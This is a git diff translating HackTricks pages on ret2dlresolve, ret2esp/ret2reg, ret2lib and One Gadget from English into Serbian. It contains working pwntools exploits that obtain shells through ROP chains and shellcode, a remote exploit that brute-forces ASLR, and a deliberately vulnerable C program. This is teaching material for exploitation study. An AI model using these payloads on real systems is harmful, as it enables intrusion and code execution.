a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md index 1fc2ea86a..10b33d439 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md 
@@ -2,38 +2,37 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -As explained in the page about [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) and [**Relro**](../common-binary-protections-and-bypasses/relro.md), binaries without Full Relro will resolve symbols (like addresses to external libraries) the first time they are used. This resolution occurs calling the function **`_dl_runtime_resolve`**. +Kao što je objašnjeno na stranici o [**GOT/PLT**](../arbitrary-write-2-exec/aw2exec-got-plt.md) i [**Relro**](../common-binary-protections-and-bypasses/relro.md), binarni fajlovi bez Full Relro će rešavati simbole (kao što su adrese do spoljašnjih biblioteka) prvi put kada se koriste. Ova rezolucija se dešava pozivanjem funkcije **`_dl_runtime_resolve`**. -The **`_dl_runtime_resolve`** function takes from the stack references to some structures it needs in order to **resolve** the specified symbol. +Funkcija **`_dl_runtime_resolve`** uzima sa steka reference na neke strukture koje su joj potrebne da **reši** specificirani simbol. -Therefore, it's possible to **fake all these structures** to make the dynamic linked resolving the requested symbol (like **`system`** function) and call it with a configured parameter (e.g. **`system('/bin/sh')`**). +Stoga, moguće je **falsifikovati sve te strukture** kako bi dinamički povezano rešavanje traženog simbola (kao što je funkcija **`system`**) i pozvati je sa konfigurisanom parametrima (npr. **`system('/bin/sh')`**). -Usually, all these structures are faked by making an **initial ROP chain that calls `read`** over a writable memory, then the **structures** and the string **`'/bin/sh'`** are passed so they are stored by read in a known location, and then the ROP chain continues by calling **`_dl_runtime_resolve`** , having it **resolve the address of `system`** in the fake structures and **calling this address** with the address to `$'/bin/sh'`. 
+Obično, sve te strukture se falsifikuju pravljenjem **inicijalnog ROP lanca koji poziva `read`** preko zapisive memorije, zatim se **strukture** i string **`'/bin/sh'`** prosleđuju tako da ih `read` sačuva na poznatoj lokaciji, a zatim ROP lanac nastavlja pozivajući **`_dl_runtime_resolve`**, imajući da **reši adresu `system`** u falsifikovanim strukturama i **poziva ovu adresu** sa adresom do `$'/bin/sh'`. > [!TIP] -> This technique is useful specially if there aren't syscall gadgets (to use techniques such as [**ret2syscall**](rop-syscall-execv/) or [SROP](srop-sigreturn-oriented-programming/)) and there are't ways to leak libc addresses. +> Ova tehnika je posebno korisna ako ne postoje syscall gadgeti (da se koriste tehnike kao što su [**ret2syscall**](rop-syscall-execv/) ili [SROP](srop-sigreturn-oriented-programming/)) i nema načina da se procure libc adrese. -Chek this video for a nice explanation about this technique in the second half of the video: +Pogledajte ovaj video za lepo objašnjenje o ovoj tehnici u drugoj polovini videa: {% embed url="https://youtu.be/ADULSwnQs-s?feature=shared" %} -Or check these pages for a step-by-step explanation: +Ili pogledajte ove stranice za objašnjenje korak po korak: - [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2dlresolve#how-it-works](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/ret2dlresolve#how-it-works) - [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve#structures) -## Attack Summary +## Sažetak napada -1. Write fake estructures in some place -2. Set the first argument of system (`$rdi = &'/bin/sh'`) -3. Set on the stack the addresses to the structures to call **`_dl_runtime_resolve`** -4. **Call** `_dl_runtime_resolve` -5. 
**`system`** will be resolved and called with `'/bin/sh'` as argument - -From the [**pwntools documentation**](https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html), this is how a **`ret2dlresolve`** attack look like: +1. Napisati falsifikovane strukture na nekom mestu +2. Postaviti prvi argument funkcije system (`$rdi = &'/bin/sh'`) +3. Postaviti na stek adrese do struktura da pozove **`_dl_runtime_resolve`** +4. **Pozvati** `_dl_runtime_resolve` +5. **`system`** će biti rešen i pozvan sa `'/bin/sh'` kao argumentom +Iz [**pwntools dokumentacije**](https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html), ovako izgleda **`ret2dlresolve`** napad: ```python context.binary = elf = ELF(pwnlib.data.elf.ret2dlresolve.get('amd64')) >>> rop = ROP(elf) @@ -53,13 +52,11 @@ context.binary = elf = ELF(pwnlib.data.elf.ret2dlresolve.get('amd64')) 0x0040: 0x4003e0 [plt_init] system 0x0048: 0x15670 [dlresolve index] ``` +## Primer -## Example - -### Pure Pwntools - -You can find an [**example of this technique here**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **containing a very good explanation of the final ROP chain**, but here is the final exploit used: +### Čisti Pwntools +Možete pronaći [**primer ove tehnike ovde**](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve/exploitation) **koji sadrži veoma dobro objašnjenje konačnog ROP lanca**, ali ovde je konačni exploit koji je korišćen: ```python from pwn import * @@ -81,9 +78,7 @@ p.sendline(dlresolve.payload) # now the read is called and we pass all the re p.interactive() ``` - -### Raw - +### Sirovo ```python # Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html # This exploit is based off of: https://github.com/sajjadium/ctf-writeups/tree/master/0CTFQuals/2018/babystack 
@@ -186,12 +181,11 @@ target.send(paylaod2) # Enjoy the shell! target.interactive() ``` - -## Other Examples & References +## Ostali Primeri i Reference - [https://youtu.be/ADULSwnQs-s](https://youtu.be/ADULSwnQs-s?feature=shared) - [https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve](https://ir0nstone.gitbook.io/notes/types/stack/ret2dlresolve) - [https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html](https://guyinatuxedo.github.io/18-ret2_csu_dl/0ctf18_babystack/index.html) - - 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`. +- 32bit, bez relro, bez kanarinca, nx, bez pie, osnovni mali buffer overflow i povratak. Da bi se iskoristilo, bof se koristi da ponovo pozove `read` sa `.bss` sekcijom i većom veličinom, da bi se u nju smeštale `dlresolve` lažne tabele za učitavanje `system`, vraćanje na main i ponovna zloupotreba inicijalnog bof-a da pozove dlresolve i zatim `system('/bin/sh')`. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md b/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md index 868f6ffa5..b90f72753 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2esp-ret2reg.md 
@@ -4,27 +4,24 @@ ## **Ret2esp** -**Because the ESP (Stack Pointer) always points to the top of the stack**, this technique involves replacing the EIP (Instruction Pointer) with the address of a **`jmp esp`** or **`call esp`** instruction. By doing this, the shellcode is placed right after the overwritten EIP. When the `ret` instruction executes, ESP points to the next address, precisely where the shellcode is stored. +**Pošto ESP (Stack Pointer) uvek pokazuje na vrh steka**, ova tehnika uključuje zamenu EIP (Instruction Pointer) sa adresom **`jmp esp`** ili **`call esp`** instrukcije. Na taj način, shellcode se postavlja odmah nakon prepisanog EIP-a. Kada se izvrši `ret` instrukcija, ESP pokazuje na sledeću adresu, tačno gde je shellcode smešten. -If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/)). +Ako **Address Space Layout Randomization (ASLR)** nije omogućen u Windows-u ili Linux-u, moguće je koristiti `jmp esp` ili `call esp` instrukcije koje se nalaze u deljenim bibliotekama. Međutim, sa aktivnim [**ASLR**](../common-binary-protections-and-bypasses/aslr/), možda će biti potrebno da se potraže ove instrukcije unutar same ranjive aplikacije (i možda će biti potrebno da se savlada [**PIE**](../common-binary-protections-and-bypasses/pie/)). -Moreover, being able to place the shellcode **after the EIP corruption**, rather than in the middle of the stack, ensures that any `push` or `pop` instructions executed during the function's operation don't interfere with the shellcode. This interference could happen if the shellcode were placed in the middle of the function's stack. 
+Štaviše, mogućnost postavljanja shellcode-a **posle korupcije EIP-a**, umesto u sredini steka, osigurava da bilo koje `push` ili `pop` instrukcije izvršene tokom rada funkcije ne ometaju shellcode. Ova ometanja mogla bi se desiti ako bi shellcode bio postavljen u sredini steka funkcije. -### Lacking space - -If you are lacking space to write after overwriting RIP (maybe just a few bytes), write an initial **`jmp`** shellcode like: +### Nedostatak prostora +Ako vam nedostaje prostora da pišete nakon prepisivanja RIP-a (možda samo nekoliko bajtova), napišite inicijalni **`jmp`** shellcode kao: ```armasm sub rsp, 0x30 jmp rsp ``` +I napišite shellcode rano na steku. -And write the shellcode early in the stack. - -### Example - -You can find an example of this technique in [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) with a final exploit like: +### Primer +Možete pronaći primer ove tehnike u [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) sa konačnim eksploatom kao: ```python from pwn import * 
@@ -36,17 +33,15 @@ jmp_rsp = next(elf.search(asm('jmp rsp'))) payload = b'A' * 120 payload += p64(jmp_rsp) payload += asm(''' - sub rsp, 10; - jmp rsp; +sub rsp, 10; +jmp rsp; ''') pause() p.sendlineafter('RSP!\n', payload) p.interactive() ``` - -You can see another example of this technique in [https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html](https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html). There is a buffer overflow without NX enabled, it's used a gadget to r**educe the address of `$esp`** and then a `jmp esp;` to jump to the shellcode: - +Možete videti još jedan primer ove tehnike u [https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html](https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html). Postoji buffer overflow bez omogućene NX, koristi se gadget da **smanji adresu `$esp`** i zatim `jmp esp;` da skoči na shellcode: ```python # From https://guyinatuxedo.github.io/17-stack_pivot/xctf16_b0verflow/index.html from pwn import * 
@@ -81,47 +76,41 @@ target.sendline(payload) # Drop to an interactive shell target.interactive() ``` - ## Ret2reg -Similarly, if we know a function returns the address where the shellcode is stored, we can leverage **`call eax`** or **`jmp eax`** instructions (known as **ret2eax** technique), offering another method to execute our shellcode. Just like eax, **any other register** containing an interesting address could be used (**ret2reg**). +Slično, ako znamo da funkcija vraća adresu na kojoj je smešten shellcode, možemo iskoristiti **`call eax`** ili **`jmp eax`** instrukcije (poznate kao **ret2eax** tehnika), nudeći još jedan način za izvršavanje našeg shellcode-a. Baš kao i eax, **bilo koji drugi registar** koji sadrži zanimljivu adresu može se koristiti (**ret2reg**). -### Example +### Primer -You can find some examples here: +Možete pronaći neke primere ovde: - [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/ret2reg/using-ret2reg) - [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/ASLR%20Smack%20and%20Laugh%20reference%20-%20Tilo%20Mueller/ret2eax.c) - - **`strcpy`** will be store in **`eax`** the address of the buffer where the shellcode was stored and **`eax`** isn't being overwritten, so it's possible use a `ret2eax`. +- **`strcpy`** će u **`eax`** sačuvati adresu bafera gde je shellcode bio smešten i **`eax`** se ne prepisuje, tako da je moguće koristiti `ret2eax`. ## ARM64 ### Ret2sp -In ARM64 there **aren't** instructions allowing to **jump to the SP registry**. 
It might be possible to find a gadget that **moves sp to a registry and then jumps to that registry**, but in the libc of my kali I couldn't find any gadget like that: - +U ARM64 ne **postoji** instrukcija koja omogućava **skakanje na SP registar**. Možda bi bilo moguće pronaći gadget koji **premesti sp u registar i zatim skoči na taj registar**, ali u libc mog kali nisam mogao pronaći takav gadget: ```bash for i in `seq 1 30`; do - ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei "[mov|add] x${i}, sp.* ; b[a-z]* x${i}( |$)"; +ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei "[mov|add] x${i}, sp.* ; b[a-z]* x${i}( |$)"; done ``` - -The only ones I discovered would change the value of the registry where sp was copied before jumping to it (so it would become useless): +Jedini koje sam otkrio bi promenili vrednost registra gde je sp kopiran pre nego što se na njega skoči (tako da bi postao beskoristan):
### Ret2reg -If a registry has an interesting address it's possible to jump to it just finding the adequate instruction. You could use something like: - +Ako registar ima zanimljivu adresu, moguće je skočiti na nju jednostavno pronalazeći adekvatnu instrukciju. Možete koristiti nešto poput: ```bash ROPgadget --binary /usr/lib/aarch64-linux-gnu/libc.so.6 | grep -Ei " b[a-z]* x[0-9][0-9]?"; ``` +U ARM64, **`x0`** čuva povratnu vrednost funkcije, tako da može biti da x0 čuva adresu bafera koji kontroliše korisnik sa shellcode-om za izvršavanje. -In ARM64, it's **`x0`** who stores the return value of a function, so it could be that x0 stores the address of a buffer controlled by the user with a shellcode to execute. - -Example code: - +Primer koda: ```c // clang -o ret2x0 ret2x0.c -no-pie -fno-stack-protector -Wno-format-security -z execstack @@ -129,34 +118,32 @@ Example code: #include void do_stuff(int do_arg){ - if (do_arg == 1) - __asm__("br x0"); - return; +if (do_arg == 1) +__asm__("br x0"); +return; } char* vulnerable_function() { - char buffer[64]; - fgets(buffer, sizeof(buffer)*3, stdin); - return buffer; +char buffer[64]; +fgets(buffer, sizeof(buffer)*3, stdin); +return buffer; } int main(int argc, char **argv) { - char* b = vulnerable_function(); - do_stuff(2) - return 0; +char* b = vulnerable_function(); +do_stuff(2) +return 0; } ``` - -Checking the disassembly of the function it's possible to see that the **address to the buffer** (vulnerable to bof and **controlled by the user**) is **stored in `x0`** before returning from the buffer overflow: +Proverom disasembly-a funkcije moguće je videti da je **adresa do bafera** (vulnerabilna na bof i **kontrolisana od strane korisnika**) **smeštena u `x0`** pre nego što se vrati iz buffer overflow-a:
-It's also possible to find the gadget **`br x0`** in the **`do_stuff`** function: +Takođe je moguće pronaći gadget **`br x0`** u funkciji **`do_stuff`**:
-We will use that gadget to jump to it because the binary is compile **WITHOUT PIE.** Using a pattern it's possible to see that the **offset of the buffer overflow is 80**, so the exploit would be: - +Iskoristićemo taj gadget da skočimo na njega jer je binarni fajl kompajliran **BEZ PIE.** Koristeći obrazac, moguće je videti da je **offset buffer overflow-a 80**, tako da bi exploit bio: ```python from pwn import * 
@@ -171,17 +158,16 @@ payload = shellcode + b"A" * (stack_offset - len(shellcode)) + br_x0 p.sendline(payload) p.interactive() ``` - > [!WARNING] -> If instead of `fgets` it was used something like **`read`**, it would have been possible to bypass PIE also by **only overwriting the last 2 bytes of the return address** to return to the `br x0;` instruction without needing to know the complete address.\ -> With `fgets` it doesn't work because it **adds a null (0x00) byte at the end**. +> Ako je umesto `fgets` korišćena neka funkcija poput **`read`**, bilo bi moguće zaobići PIE tako što bi se **samo prepisala poslednja 2 bajta adrese povratka** da bi se vratio na instrukciju `br x0;` bez potrebe da se zna cela adresa.\ +> Sa `fgets` to ne funkcioniše jer **dodaje null (0x00) bajt na kraju**. -## Protections +## Protekcije -- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it. -- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Those can make harder to find a instruction to jump to esp or any other register. +- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): Ako stek nije izvršiv, ovo neće pomoći jer treba da stavimo shellcode na stek i skočimo da ga izvršimo. +- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Ove zaštite mogu otežati pronalaženje instrukcije na koju treba skočiti, bilo na esp ili neki drugi registar. -## References +## Reference - [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode) - [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp) 
diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md index c213407d3..377965741 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md 
@@ -2,103 +2,90 @@ {{#include ../../../banners/hacktricks-training.md}} -## **Basic Information** +## **Osnovne informacije** -The essence of **Ret2Libc** is to redirect the execution flow of a vulnerable program to a function within a shared library (e.g., **system**, **execve**, **strcpy**) instead of executing attacker-supplied shellcode on the stack. The attacker crafts a payload that modifies the return address on the stack to point to the desired library function, while also arranging for any necessary arguments to be correctly set up according to the calling convention. +Suština **Ret2Libc** je preusmeravanje toka izvršavanja ranjivog programa na funkciju unutar deljene biblioteke (npr., **system**, **execve**, **strcpy**) umesto izvršavanja napadačevog shell koda na steku. Napadač kreira payload koji menja adresu povratka na steku da pokazuje na željenu funkciju biblioteke, dok takođe obezbeđuje da su svi potrebni argumenti ispravno postavljeni prema konvenciji pozivanja. -### **Example Steps (simplified)** +### **Primer koraka (pojednostavljeno)** -- Get the address of the function to call (e.g. system) and the command to call (e.g. /bin/sh) -- Generate a ROP chain to pass the first argument pointing to the command string and the execution flow to the function +- Dobiti adresu funkcije koju treba pozvati (npr. system) i komandu koju treba pozvati (npr. 
/bin/sh) +- Generisati ROP lanac da prosledi prvi argument koji pokazuje na string komande i tok izvršavanja funkciji -## Finding the addresses - -- Supposing that the `libc` used is the one from current machine you can find where it'll be loaded in memory with: +## Pronalaženje adresa +- Pretpostavljajući da je `libc` koja se koristi ona sa trenutnog računara, možete pronaći gde će biti učitana u memoriji sa: ```bash ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time) ``` - -If you want to check if the ASLR is changing the address of libc you can do: - +Ako želite da proverite da li ASLR menja adresu libc, možete uraditi: ```bash for i in `seq 0 20`; do ldd ./ | grep libc; done ``` - -- Knowing the libc used it's also possible to find the offset to the `system` function with: - +- Poznavanje korišćene libc takođe omogućava pronalaženje ofseta do `system` funkcije sa: ```bash readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system ``` - -- Knowing the libc used it's also possible to find the offset to the string `/bin/sh` function with: - +- Poznavanje korišćenog libc-a takođe omogućava pronalaženje ofseta do stringa `/bin/sh` funkcije sa: ```bash strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh ``` +### Koristeći gdb-peda / GEF -### Using gdb-peda / GEF - -Knowing the libc used, It's also possible to use Peda or GEF to get address of **system** function, of **exit** function and of the string **`/bin/sh`** : - +Poznavajući korišćenu libc, takođe je moguće koristiti Peda ili GEF da dobijete adresu funkcije **system**, funkcije **exit** i stringa **`/bin/sh`** : ```bash p system p exit find "/bin/sh" ``` +### Korišćenje /proc/\/maps -### Using /proc/\/maps +Ako proces kreira **decu** svaki put kada razgovarate s njim (mrežni server), pokušajte da **pročitate** tu datoteku (verovatno će vam biti potrebna root privilegija). 
-If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root). - -Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process. +Ovde možete pronaći **tačno gde je libc učitan** unutar procesa i **gde će biti učitan** za svaku decu procesa. ![](<../../../images/image (853).png>) -In this case it is loaded in **0xb75dc000** (This will be the base address of libc) +U ovom slučaju, učitan je u **0xb75dc000** (Ovo će biti osnovna adresa libc) -## Unknown libc +## Nepoznata libc -It might be possible that you **don't know the libc the binary is loading** (because it might be located in a server where you don't have any access). In that case you could abuse the vulnerability to **leak some addresses and find which libc** library is being used: +Može biti moguće da **ne znate koju libc binarni fajl učitava** (jer se možda nalazi na serveru kojem nemate pristup). U tom slučaju, mogli biste iskoristiti ranjivost da **procurite neke adrese i saznate koja libc** biblioteka se koristi: {{#ref}} rop-leaking-libc-address/ {{#endref}} -And you can find a pwntools template for this in: +I možete pronaći pwntools šablon za ovo u: {{#ref}} rop-leaking-libc-address/rop-leaking-libc-template.md {{#endref}} -### Know libc with 2 offsets +### Poznavanje libc sa 2 ofseta -Check the page [https://libc.blukat.me/](https://libc.blukat.me/) and use a **couple of addresses** of functions inside the libc to find out the **version used**. +Proverite stranicu [https://libc.blukat.me/](https://libc.blukat.me/) i koristite **nekoliko adresa** funkcija unutar libc da biste saznali **korisćenu verziju**. -## Bypassing ASLR in 32 bits +## Obilaženje ASLR na 32 bita -These brute-forcing attacks are **only useful for 32bit systems**. 
- -- If the exploit is local, you can try to brute-force the base address of libc (useful for 32bit systems): +Ovi napadi brute-force su **samo korisni za 32bitne sisteme**. +- Ako je exploit lokalni, možete pokušati da brute-force-ujete osnovnu adresu libc (korisno za 32bitne sisteme): ```python for off in range(0xb7000000, 0xb8000000, 0x1000): ``` - -- If attacking a remote server, you could try to **burte-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function. +- Ako napadate udaljeni server, možete pokušati da **brute-force-ujete adresu `libc` funkcije `usleep`**, prosledjujući kao argument 10 (na primer). Ako u nekom trenutku **serveru treba dodatnih 10s da odgovori**, pronašli ste adresu ove funkcije. ## One Gadget -Execute a shell just jumping to **one** specific **address** in libc: +Izvršite shell jednostavno skakanjem na **jednu** specifičnu **adresu** u libc: {{#ref}} one-gadget.md {{#endref}} -## x86 Ret2lib Code Example - -In this example ASLR brute-force is integrated in the code and the vulnerable binary is loated in a remote server: +## x86 Ret2lib Primer Koda +U ovom primeru ASLR brute-force je integrisan u kod i ranjivi binarni fajl se nalazi na udaljenom serveru: ```python from pwn import * 
@@ -106,60 +93,59 @@ c = remote('192.168.85.181',20002) c.recvline() for off in range(0xb7000000, 0xb8000000, 0x1000): - p = "" - p += p32(off + 0x0003cb20) #system - p += "CCCC" #GARBAGE, could be address of exit() - p += p32(off + 0x001388da) #/bin/sh - payload = 'A'*0x20010 + p - c.send(payload) - c.interactive() +p = "" +p += p32(off + 0x0003cb20) #system +p += "CCCC" #GARBAGE, could be address of exit() +p += p32(off + 0x001388da) #/bin/sh +payload = 'A'*0x20010 + p +c.send(payload) +c.interactive() ``` +## x64 Ret2lib Primerak Koda -## x64 Ret2lib Code Example - -Check the example from: +Proverite primer iz: {{#ref}} ../ {{#endref}} -## ARM64 Ret2lib Example +## ARM64 Ret2lib Primerak -In the case of ARM64, the ret instruction jumps to whereber the x30 registry is pointing and not where the stack registry is pointing. So it's a bit more complicated. +U slučaju ARM64, ret instrukcija skače na mesto na koje pokazuje x30 registar, a ne na mesto na koje pokazuje registar steka. Tako da je malo komplikovanije. -Also in ARM64 an instruction does what the instruction does (it's not possible to jump in the middle of instructions and transform them in new ones). +Takođe, u ARM64, instrukcija radi ono što instrukcija radi (nije moguće skočiti usred instrukcija i transformisati ih u nove). -Check the example from: +Proverite primer iz: {{#ref}} ret2lib-+-printf-leak-arm64.md {{#endref}} -## Ret-into-printf (or puts) +## Ret-into-printf (ili puts) -This allows to **leak information from the process** by calling `printf`/`puts` with some specific data placed as an argument. For example putting the address of `puts` in the GOT into an execution of `puts` will **leak the address of `puts` in memory**. +Ovo omogućava **curenje informacija iz procesa** pozivanjem `printf`/`puts` sa nekim specifičnim podacima postavljenim kao argument. Na primer, stavljanje adrese `puts` u GOT prilikom izvršavanja `puts` će **curiti adresu `puts` u memoriji**. 
## Ret2printf -This basically means abusing a **Ret2lib to transform it into a `printf` format strings vulnerability** by using the `ret2lib` to call printf with the values to exploit it (sounds useless but possible): +Ovo u suštini znači zloupotrebu **Ret2lib da se transformiše u ranjivost format stringova `printf`** korišćenjem `ret2lib` za pozivanje printf sa vrednostima za eksploataciju (zvuči besmisleno, ali je moguće): {{#ref}} ../../format-strings/ {{#endref}} -## Other Examples & references +## Ostali Primeri & reference - [https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csaw19_babyboi/index.html) - - Ret2lib, given a leak to the address of a function in libc, using one gadget +- Ret2lib, uz curenje adrese funkcije u libc, koristeći jedan gadget - [https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/csawquals17_svc/index.html) - - 64 bit, ASLR enabled but no PIE, the first step is to fill an overflow until the byte 0x00 of the canary to then call puts and leak it. With the canary a ROP gadget is created to call puts to leak the address of puts from the GOT and the a ROP gadget to call `system('/bin/sh')` +- 64 bita, ASLR omogućeno, ali bez PIE, prvi korak je popuniti preliv do bajta 0x00 kanarija da bi se zatim pozvao puts i curio. Sa kanarijom se kreira ROP gadget za pozivanje puts da curi adresu puts iz GOT-a i ROP gadget za pozivanje `system('/bin/sh')` - [https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/fb19_overfloat/index.html) - - 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget. +- 64 bita, ASLR omogućeno, bez kanarija, preliv steka u main iz funkcije deteta. 
ROP gadget za pozivanje puts da curi adresu puts iz GOT-a, a zatim poziva jedan gadget. - [https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html](https://guyinatuxedo.github.io/08-bof_dynamic/hs19_storytime/index.html) - - 64 bits, no pie, no canary, no relro, nx. Uses write function to leak the address of write (libc) and calls one gadget. +- 64 bita, bez pie, bez kanarija, bez relro, nx. Koristi write funkciju da curi adresu write (libc) i poziva jedan gadget. - [https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html](https://guyinatuxedo.github.io/14-ret_2_system/asis17_marymorton/index.html) - - Uses a format string to leak the canary from the stack and a buffer overflow to calle into system (it's in the GOT) with the address of `/bin/sh`. +- Koristi format string da curi kanarija iz steka i preliv bafera da pozove system (to je u GOT-u) sa adresom `/bin/sh`. - [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html) - - 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check). +- 32 bita, bez relro, bez kanarija, nx, pie. Zloupotreba lošeg indeksiranja da curi adrese libc i heap-a iz steka. Zloupotreba prelivanja bafera da se uradi ret2lib pozivajući `system('/bin/sh')` (adresa heap-a je potrebna da bi se zaobišla provera). {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md index 5b24ece5f..d117b5cee 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/one-gadget.md 
@@ -2,36 +2,32 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -[**One Gadget**](https://github.com/david942j/one_gadget) allows to obtain a shell instead of using **system** and **"/bin/sh". One Gadget** will find inside the libc library some way to obtain a shell (`execve("/bin/sh")`) using just one **address**.\ -However, normally there are some constrains, the most common ones and easy to avoid are like `[rsp+0x30] == NULL` As you control the values inside the **RSP** you just have to send some more NULL values so the constrain is avoided. +[**One Gadget**](https://github.com/david942j/one_gadget) omogućava dobijanje shel-a umesto korišćenja **system** i **"/bin/sh". One Gadget** će pronaći unutar libc biblioteke neki način da dobije shell (`execve("/bin/sh")`) koristeći samo jednu **adresu**.\ +Međutim, obično postoje neka ograničenja, najčešća i lako izbegnuta su kao `[rsp+0x30] == NULL`. Pošto kontrolišete vrednosti unutar **RSP**, samo treba da pošaljete još nekoliko NULL vrednosti kako bi se ograničenje izbeglo. ![](<../../../images/image (754).png>) - ```python ONE_GADGET = libc.address + 0x4526a rop2 = base + p64(ONE_GADGET) + "\x00"*100 ``` - -To the address indicated by One Gadget you need to **add the base address where `libc`** is loaded. +Da biste dodali adresu koju je naznačio One Gadget, potrebno je **dodati osnovnu adresu gde je `libc`** učitana. > [!TIP] -> One Gadget is a **great help for Arbitrary Write 2 Exec techniques** and might **simplify ROP** **chains** as you only need to call one address (and fulfil the requirements). +> One Gadget je **velika pomoć za Arbitrary Write 2 Exec tehnike** i može **pojednostaviti ROP** **lance** jer je potrebno pozvati samo jednu adresu (i ispuniti zahteve). ### ARM64 -The github repo mentions that **ARM64 is supported** by the tool, but when running it in the libc of a Kali 2023.3 **it doesn't find any gadget**. 
